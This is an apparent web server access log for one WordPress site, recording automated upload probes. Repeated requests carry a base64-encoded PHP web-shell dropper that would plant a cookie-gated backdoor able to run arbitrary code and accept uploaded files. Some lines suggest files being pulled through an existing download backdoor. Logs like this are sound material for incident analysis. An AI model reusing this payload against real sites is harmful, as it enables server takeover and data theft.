194.68.32.135 - - [07/Dec/2025:17:47:09 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2867.8 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:17:57:45 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
66.249.64.110 - - [07/Dec/2025:18:02:01 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS8udHJhc2gudGFyLmd6 HTTP/1.1" 200 99 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
192.121.16.196 - - [07/Dec/2025:17:38:36 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/5.0)"
194.68.32.135 - - [07/Dec/2025:17:47:16 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2867.8 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:17:47:17 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2867.8 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:17:57:46 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [07/Dec/2025:18:06:17 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2906.69 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:18:06:17 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2906.69 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:18:06:17 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2906.69 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:18:06:18 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2906.69 Safari/537.36"
144.76.19.70 - - [07/Dec/2025:18:10:35 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)"
157.55.39.223 - - [07/Dec/2025:18:12:26 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.64.108 - - [07/Dec/2025:18:13:53 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9hd3N0YXRzMTAyMDIzLm1ldGFsZXNjcm9zZS5jb20udHh0 HTTP/1.1" 200 9361 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
192.121.16.196 - - [07/Dec/2025:18:16:38 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [07/Dec/2025:18:16:38 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [07/Dec/2025:18:16:39 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [07/Dec/2025:18:16:39 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [07/Dec/2025:18:25:47 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [07/Dec/2025:18:25:48 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [07/Dec/2025:18:25:49 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [07/Dec/2025:18:25:49 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [07/Dec/2025:17:47:22 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2867.8 Safari/537.36"
66.249.64.109 - - [07/Dec/2025:17:51:10 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9tYWlsL25ldy8xNzQ4NjA2NzE4Lk02NzQzNzBQMTQ0MjIzMy5hbHRhcjQzLnN1cHJlbWVwYW5lbDQzLmNvbSxTPTMzNTcsVz0zNDI4 HTTP/1.1" 200 1322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:17:57:30 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [07/Dec/2025:17:57:46 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [07/Dec/2025:17:57:47 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [07/Dec/2025:17:57:47 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
144.76.19.70 - - [07/Dec/2025:18:10:35 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)"
52.167.144.142 - - [07/Dec/2025:18:12:38 +0000] "GET /sitemap.xml HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:18:16:37 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0"
192.121.16.196 - - [07/Dec/2025:18:16:37 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0"
198.186.131.59 - - [07/Dec/2025:18:06:18 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2906.69 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:18:06:18 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2906.69 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:18:25:30 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [07/Dec/2025:18:25:48 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
66.249.64.110 - - [07/Dec/2025:18:34:27 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9hd3N0YXRzMTEyMDI0Lm1ldGFsZXNjcm9zZS5jb20udHh0 HTTP/1.1" 200 13613 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
192.121.16.196 - - [07/Dec/2025:18:35:24 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2806.37 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:18:45:00 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0"
192.121.16.196 - - [07/Dec/2025:18:34:48 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2806.37 Safari/537.36"
66.249.64.109 - - [07/Dec/2025:18:39:44 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9wdWJsaWNfaHRtbC9hZWVlMS9zaXRlcGFkLnBocC50YXI= HTTP/1.1" 200 215 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
194.68.32.135 - - [07/Dec/2025:18:44:59 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0"
194.68.32.135 - - [07/Dec/2025:18:44:59 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0"
192.121.16.196 - - [07/Dec/2025:18:54:22 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.21 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:18:54:22 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 